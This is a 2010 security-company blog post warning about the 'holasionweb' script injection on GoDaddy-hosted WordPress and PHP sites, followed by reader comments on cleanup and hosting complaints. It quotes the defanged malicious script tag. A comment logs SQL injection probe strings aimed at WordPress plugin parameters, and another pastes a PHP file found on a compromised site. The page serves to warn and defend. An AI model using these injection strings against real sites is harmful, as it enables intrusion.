• Skip to primary navigation
  • Skip to main content
  • Skip to footer
WPSecurityLock – Malware removal & WordPress security services

WPSecurityLock – Malware removal & WordPress security services

WordPress security, malware removal, repair, backups, ongoing maintenance, installation, site migration & support services – WP Security Lock.

  • Facebook
  • LinkedIn
  • Twitter
  • Home
  • About
    • About Us
    • Speaker Information
    • Contact Us by Phone, Email or Live Chat
    • Testimonials
  • Security Services
    • Malware / Virus Removal
    • WordPress Security and Installation Services
    • Monthly Security Packages
    • SSL Conversion Service (HTTP to HTTPS)
  • Blog
  • Resources
  • Contact
  • SafeWP

Breaking News: WordPress Hacked with holasionweb on Go Daddy!

May 12, 2010 By Regina Smola 47 Comments

Wordpress Hacked Godaddy Holasionweb Realsafe-23WordPress sites self-hosted on GoDaddy.com are reporting being maliciously hacked today with <script src=”http:// holasionweb .com/ oo .php”></script>! (Note: We have added spaces in the URL on purpose.)

Warning: This is dangerous malware! Anyone visiting an infected website can get their computers infected, if they do not have a up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click “yes” or “okay” to download.

If your website is infected, put it down for maintenance immediately. There are instructions on how to do so at this post.

We have also received reports that this not only affected WordPress installations, but Joomla and other php-based platforms.

Here's the holasionweb symptoms:

  1. Infected sites get redirected to a fake AV (scareware).
  2. Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
  3. Redirects to a blank page at www.1.realsafe-23.net/?……
  4. Source code reveals <script src=”http:// holasionweb .com/ oo. php”> in the the header section </head> of the infected pages.

Wordpress Hacked Godaddy Holasionweb Realsafe-23

How to fix your hacked WordPress site on GoDaddy.com

  • We have written up instructions on how to remove malware and restore your WordPress site here.
  • David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.

We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.

UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.

UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.

Bloggers,

We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.

In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?

– Noah Plumb
Go Daddy Communications

UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.

VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.

Securely yours,

Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter

Share32
Tweet
Pin
32 Shares

Filed Under: Malware and Virus Alerts Tagged With: Go Daddy base64_, Go Daddy hacked again, holasionweb-oo.php, how to fix hacked wordpress, how to wordpress, Joomla, realsafe-23.net, wordpress hacked on Go Daddy

Reader Interactions

Comments

  1. Genner says

    May 12, 2010 at 9:44 am

    Hola
    Seguí todas las instrucciones de este blog para asegurar mis blogs, pero de nuevo están hackeados por 3ª vez. Que pasa con Go Daddy???????.

    Reply
  2. Hacked Again says

    May 12, 2010 at 9:49 am

    Hacked again!!!!
    Site hosted by GoDaddy AND it’s not a WP site.

    The first thing I do in the morning, is connecting to FTP server to check out the date when files were modified.

    If I see a recent modification to all files (usually happens between 1AM and 4 AM), I just copy over files from my backup.

    I really tired of all these recent hackes. I guess it’s time to move all my sites to a new hosting company. 🙁

    Well… looks like all hacked files on the first site were overwritten successfully, now I have to check 8 more sites.

    Reply
    • kathy says

      May 12, 2010 at 2:24 pm

      Here here I agree! I’ll be moving all of my accounts very very soon!

      Reply
  3. John Rothstein says

    May 12, 2010 at 2:49 pm

    I got attacked twice. I am moving my hosting away from godaddy. I was referred to a guy that promptly removed the viruses for me, not once but twice. He also restored my blog which was lost after following the advice of the hacks at godaddy. Thank God I had backed my blog up or my blog would have been lost. Here is his name and email: [link edited]

    Mine was a little more complicated than just the virus removal the first time around. But today he removed the virus in minutes. I recommend his services and I do not make a penny on this referral. Good luck!

    John Rothstein

    Reply
  4. Seth says

    May 12, 2010 at 9:52 am

    I’ve found the script added in wp_footer, not wp_head.

    Reply
    • kathy says

      May 12, 2010 at 2:26 pm

      It will be more than just the footer, check your complete wp_content file. All of my current template files were hit along with five other sites, not wordpress, however written in php.

      Reply
      • Economists Do It With Models says

        May 12, 2010 at 4:34 pm

        It appears to me that this thing modified the .htaccess file and then stuck in an encoded script at the beginning of every php file. Not hard to remove, but super annoying.

        Reply
  5. aika says

    May 12, 2010 at 10:13 am

    I am also continuously being hacked, and on a GoDaddy server. it is starting to get tiring, looking for a permanent solution.

    Reply
  6. Peter Souza IV says

    May 12, 2010 at 10:35 am

    The hack allows them to modify all .php files on the entire server, not just your hosted package.

    I don’t even use WordPress, but because I use GoDaddy for shared webhosting, my site was hacked along with everyone else’s accounts on that machine.

    I’m moving.

    Reply
    • Hacked Again says

      May 12, 2010 at 11:01 am

      The hack allows them to modify all .php files on the entire server, not just your hosted package.

      Yep, that’s what I’m thinking too.

      I’m moving.

      I guess me too. I’m tired of GoDaddy.

      I don’t even use WordPress, but because I use GoDaddy for shared webhosting, my site was hacked along with everyone else’s accounts on that machine.

      That would explain why my sites running completely different systems get hacked too.

      Anyone, please give us an idea of good hosting company??

      Reply
      • Seriously? says

        May 12, 2010 at 11:13 am

        I hear inmotionhosting is pretty good. Godaddy is cheap but I would rather pay a little extra for solid tech support than none at all. I hope godaddy goes under, I have lost a ton of time and money this month because of this.

        Reply
      • Stephen Akins says

        May 12, 2010 at 12:00 pm

        I use Lunar Pages a fair bit. They’re reasonably priced, the servers are fast, and the support is good.

        Reply
  7. Seriously? says

    May 12, 2010 at 10:43 am

    Seriously? My website is hacked for the 3rd time in less than 1 month. Its only a matter of time before I get banned from google and years of work down the drain. What is Godaddy even doing about this? Worst tech support on the planet, half of them don’t even know how to use a computer, let alone fix a hacked website.

    I tried your ‘quick fix’ and although it did remove the code, now I can’t even login to my wp-admin. I keep getting a pluggable.php error. :S

    Reply
    • Kristi says

      May 12, 2010 at 12:10 pm

      Not that it makes things better, but if you do get the Google warning added to your site because of malware, it takes about 1 – 2 days to get removed. You have to contact Google immediately after your site is cleared to get it removed. It happened to a blog on Network Solutions because he went the route of letting the hosting company clean it, which took a day. If you get your site cleaned up within 12 hours it seems, Google doesn’t have enough time to catch on.

      Reply
  8. Hacked Again says

    May 12, 2010 at 10:52 am

    WOW!!!!!

    6 sites hacked earlier this morning!!!!

    All hosted by GoDaddy.

    4 wordpress sites.
    2 completely different publishing systems.

    Guys, I start thinking some unhappy GoDaddy employee modifying our sites. Is it possible?

    Reply
    • Allen says

      May 12, 2010 at 10:14 pm

      It would seem like this could possibly be and inside job – but other hosting companies are being hit to. I am wandering if the hosting companies are talking to each other and if there is any kind of consortium of security experts working together on this.

      Reply
  9. JerryBates says

    May 12, 2010 at 11:11 am

    I went through this on some of my client sites on Friday and now I get to do it all over again today?!? I’ve notified GoDaddy (http://www.godaddy.com/securityissue) about it and I wonder if they will blame their customers for having out-of-date WordPress versions again, just as they did for the zettapetta exploit.

    My WordPress was current then and it’s current now, so it’s obvious that GoDaddy is better at pointing fingers than they are at addressing the real problem. I’m now happily an ex-customer and don’t worry, I won’t stay long enough to let the door hit my ass on the way out!

    Reply
  10. Mart says

    May 12, 2010 at 11:21 am

    From what I can see, the WP install I have on (Godaddy shared linux) hosting hasn’t been infected at all, but it IS running incredibly slowly. Would that be because other sites on my shared hosting account have been infected? I’ve only noticed it in the past few days.

    Reply
    • Economists Do It With Models says

      May 12, 2010 at 4:24 pm

      I noticed it too and was wondering what was going on. It’s been like that for about a week for me, even though my site didn’t get compromised until this morning.

      Reply
  11. InglesTotal says

    May 12, 2010 at 11:49 am

    HACKED AGAIN!!! Well, I am starting to look for a ner hosting company like Gator. This is just unbelievable. It looks like an “in house” job to me. 4th time atacked in total. Finally found the script in wp-footer.

    What I did:

    1) Went to wp-config and cleaned it (so I could log into wo-admin)
    2) Reinstalled wp with the upgrade
    3) Deleted all my template and installed a brand new. (And I has a copy of my index files, home etc clean so that was easy
    4) Reinstalled plugins
    5) Searched for any php files not covered in the process.

    Now it is working but seems like I have to expect it to happen again. I thought it was the same code but it is a whole new attack which means GoDaddy can’t figure the problem out. I am going to call GATOR and see how I can make the switch. I hate messing with my files on the server and database but I think there is no other way.

    Reply
  12. kev grant says

    May 12, 2010 at 12:20 pm

    lol, yep, same hosting package (one out of 3 different ones) done again, the 3rd time in 3 weeks, even as the sites are scheduled into the work queue to be moved imminently.

    all WP installations up-to-date and super securitied up. nothing to do with WP whatsoever, a particular machine at Godaddy must be permanently compromised, the hacker can just dial in again at will and do it again whenever they fancy.

    I must say after years with no trouble from Godaddy I am shocked at just how $hit they are at this.

    Reply
    • InglesTotal says

      May 12, 2010 at 1:03 pm

      So what are our options? Is it time to move? Should we sue? I lost money, clients and traffic. Who wants to go back to an infected site. Even when I tell them that it is cleaned they doubt ever comming back. NOT TO BLAME!

      Reply
      • Seriously? says

        May 12, 2010 at 1:48 pm

        I agree, we should be entitled to something for having to deal with all of this. I have lost money, traffic and my blogs reputation because of this. Every single one of my pages this morning was redirecting to a trojan download. I seriously feel bad for any of my visitors that have to deal with this.

        This has been going on for way too long and it needs to stop NOW.

        Reply
        • Lonely Conservative says

          May 12, 2010 at 2:10 pm

          My sentiments, exactly. Lost money, lost traffic, lost reputation. My blog was taking off. Every time these hackers hit is sets me back more.

          Reply
  13. Regina says

    May 12, 2010 at 5:29 pm

    VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.

    Reply
    • Henry says

      May 12, 2010 at 6:23 pm

      Gee… I won’t be able to get home till about 9pm. (in about 3 hours) Am I in trouble…. man this is such a huge problem. I am worried now they can get my database. So now they can steal our crao pretty much huh

      Reply
    • Seriously? says

      May 12, 2010 at 6:33 pm

      Thanks for all the updates. WPsecuritylock has been right on top of this since day 1.

      Reply
    • Hacked Again says

      May 12, 2010 at 10:11 pm

      VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.

      I’ll do it just in case but I rally doubt changing the password will help.
      How changing the DB password helps if they can access wp-config.php???
      Why the hackers modify only site files but do not touch databases if they have full access?

      Reply
  14. InglesTotal says

    May 12, 2010 at 3:43 pm

    So the latest update here says that it is spreading to other hosting companies. Therefore maybe it is not time to move just yet since using my logic, the first to get the problem usually is the first to solve it. Being go daddy hit so many times they have to be learning. Well… if this truly is going worldwide maybe we are all screwed. HIRE SOME HACKERS TO HACK THE HACKES DANG IT

    Reply
  15. James says

    May 12, 2010 at 4:20 pm

    How do we know if our website has been hacked or not? I’m just starting out with all this internet stuff but got a warning message when i was searching on some site that AVG encountered this virus. Does this mean that I went to a website that was hacked or my websites have been? I just don’t understand but it would be a great help if you guys could help me out.

    Reply
    • Regina says

      May 12, 2010 at 4:38 pm

      James,

      Thanks for your question. I suggest you get your site monitored for malware to be safe. Here’s our discounted affiliate link: https://wpsecuritylock.com/sucuri. We use them for our website and they rock!

      Reply
    • Kristi says

      May 13, 2010 at 10:18 am

      If you want to check your own site or a site that you are on that is PHP based (like WordPress), just view the page source and scroll down to the very bottom. If you see a call for a PHP script near the end (like the holasionweb one mentioned in the first paragraph of this post), then the site is hacked.

      Reply
  16. Economists Do It With Models says

    May 12, 2010 at 4:21 pm

    I had this problem happen to my site, so I contacted GoDaddy to inform them of the problem. I was very careful not to request any help in actually cleaning up the mess, and I said that I just wanted them to work on their security and not allow it to happen again.

    I got the following response AFTER I had cleaned everything:

    Dear Sir/Madam,

    Thank you for contacting the Hosting Security Team.

    We have checked and confirmed that your hosting account economistsdoitwithmodels.com had php files which contained a javascript malware injection. We have since removed the contaminated code as a courtesy. Please note, that this is not a permanent solution because it does not remove the vulnerability that allowed the malicious code to be inserted.

    To address the specific vulnerability, please ensure that you fully upgrade all installations of web based software such as WordPress or Joomla to the most recent version.

    Ummmmmmm…let’s see. First, plenty of people with WordPress 2.9.2 are reporting this problem, so the GoDaddy people are clearly trying to get people to think that it’s not their fault. Second, I’m not sure I want the GoDaddy people removing anything from my files, ESPECIALLY since they did this without my permission and even without warning. I can only imagine the versioning issues that this could have created.

    For the record, if you want to scrub files but don’t want to deal directly with Perl or anything, there’s freeware called TextCrawler that is super helpful. (It can deal with regular expressions and whatnot.) The downside is that you have to get the files to your local machine and back.

    Reply
    • enio san says

      May 13, 2010 at 3:52 pm

      Hey,
      Same thing here… I called them yesterday, very early morning to report the problem, but my site is not on WP, but Modx CMS, Just like you, I just wanted let them know about the attacks to there servers… first, this guy didnt seem to care or even believed me.
      I sent them an email and they said that it must have been my fault for using a very easy to hack password.
      I am really thinking on moving to another host, like MediaTemple, and perhaps get my own virtual server or something.

      Reply
  17. Rick says

    May 12, 2010 at 4:49 pm

    Looks like I moved hosts just in time. After being hacked twice in two weeks on GoDaddy – and then listening to them tell the world it was our fault – I had to go. I will not pay money to a company to be abused like that.

    Amazing how I have the same websites, same files and took the same steps as I did over at GoDaddy, yet I am fine now.

    I moved multiple websites which took a good deal of time. Like the others who have posted above, I also lost sales, visitors, MONEY and much time cleaning up the hackings.

    GoDaddy, it is time to step up and admit your vulnerabilities. Stop blaming WordPress. Stop blaming your hard working customers. And FIX THE PROBLEM.

    I’m looking at the poor folks above who are still dealing with this, and it makes me sick.

    To those of you looking to switch hosts: do your homework. Get personal referrals to legitimate and secure hosting providers. Do not trust affiliate review sites. And google the heck out of any company you plan to use.

    I had decided on one company and upon digging into some research, I found they had their own round of attacks at the start of this year. While no hosting company is immune to hacking, the instances you find should be minimal and not the norm. Also, I looked very carefully at the companies’ responses to customer complaints.

    And when you call the company to migrate, tell them that you’ve been hacked multiple times on your current host. Ask them what they are doing to prepare for these attacks, and have them personally walk you through securing your site so that you can minimize your risk.

    Any hosting company worth your money will do this for you.

    It alsowouldn’t hurt to point them to the YouTube video WPSecurityLock posted of a hacker helping himself to websites hosted on Network Solutions. Tell them you’re not going to put up with that crap.

    Migrating is not hard. Don’t be afraid to leave a host who refuses to take your business seriously. We all deserve better.

    Reply
    • Kristi says

      May 13, 2010 at 10:22 am

      I did talk to someone yesterday who was in the same boat as you are – same files, same site, moved from Godaddy to HostGator and was not hacked. She didn’t take any extra security measures, change passwords, etc. She just moved hosts and manage to miss the attack that my site has gotten for the third time in a month, even though I have security in place and am fully upgraded to the latest version. So moving is certainly not a bad idea.

      Reply
  18. Paul says

    May 12, 2010 at 4:52 pm

    I found the easiest solution to this hack here:
    http://stackoverflow.com/questions/2798745/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website

    It took about 2 minutes to clean. Very grateful as last time we were hit (last week) it took me hours to fix!

    Reply
  19. Allen says

    May 12, 2010 at 7:58 pm

    To everyone that has a service request in with WPSecurityLock:
    With today’s brute force, malicious attacks, we are backed up on cleaning hacked sites.

    Please be patient.
    If you are able, upload an Index.html file saying your site is in maintenance.

    Go to our previous post and follow the steps in order – https://wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

    Reply
  20. Hacked Again says

    May 12, 2010 at 10:12 pm

    Do you think moving from shared hosting to dedicated hosting will help?

    Reply
    • Alex Sysoef says

      May 13, 2010 at 7:20 am

      It will but only if you actually KNOW how to secure your own server. I use dedicated servers and VPS and can tell you first hand that even with all my technical knowledge it is very time consuming, although – more rewarding 🙂 and I also have noone to blame but myself if there is security problem.

      So, make your choice carefully and after considering what you want to do – run business or be sysadmin? 😉

      Cheers!

      Reply
  21. Vladimir says

    May 13, 2010 at 10:39 am

    There is a better, faster and easier solution to this holasionweb problem, just read it at tintation.com

    Reply
    • Regina says

      May 13, 2010 at 12:56 pm

      Hi Vladimir,

      Thanks for your comment. The script great and fast. But… did you check your server to delete the trigger php file? This contains a different injected code that usually is found the day before it shoots into your php files.

      Reply
      • InglesTotal says

        May 13, 2010 at 4:18 pm

        Where do we look for this? I need to find it too I guess.

        Reply
  22. gavacho says

    May 13, 2010 at 10:01 pm

    I found a VERY suspicious looking file (I deleted it) on my website named gdform.php. Here is the code it contained (it also had the base 64 encoded code identical to all the other php files at the top)

    <?php
    $request_method = $_SERVER["REQUEST_METHOD"];
    if($request_method == "GET"){
    $query_vars = $_GET;
    } elseif ($request_method == "POST"){
    $query_vars = $_POST;
    }
    reset($query_vars);
    $t = date("U");

    $file = $_SERVER['DOCUMENT_ROOT'] . "/../data/gdform_" . $t;
    $fp = fopen($file,"w");
    while (list ($key, $val) = each ($query_vars)) {
    fputs($fp,"n”);
    fputs($fp,”$valn”);
    fputs($fp,”n”);
    if ($key == “redirect”) { $landing_page = $val;}
    }
    fclose($fp);
    if ($landing_page != “”){
    header(“Location: http://“.$_SERVER[“HTTP_HOST”].”/$landing_page”);
    } else {
    header(“Location: http://“.$_SERVER[“HTTP_HOST”].”/”);
    }

    ?>

    I wonder how they were able to place this file in my document root?

    Reply
  23. Michelle says

    May 14, 2010 at 11:41 am

    I just had someone try and log in using the backend with an IP 188.72.213.44!

    The webpage was my domain followed by /wp-content/plugins/wordspew/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875616B,3,4,5–

    and the Offending Parameter: id = -998877 UNION SELECT 0,1,0x6875616B,3,4,5–

    I don’t have the wordspew plugin.

    Reply
  24. Michelle says

    May 14, 2010 at 12:11 pm

    He also tried using this plugin too

    wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B

    Reply
  25. Jim Johnson,CRS says

    May 22, 2010 at 9:17 pm

    Thanks for fixing my blog!

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Let’s work together:

Get in touch with us and send some basic info about your project. Don't be shy, we can help with just about anything.

Contact Us!

Footer

  • Facebook
  • LinkedIn
  • Twitter

Contact

Call 815-600-7270
Contact
Mo,Tu,We,Th,Fr 9:00 am – 5:00 pm

Get WordPress Help Now

Chat With Us!
Submit A Support Ticket

Copyright © 2023 | WP Security Lock, Inc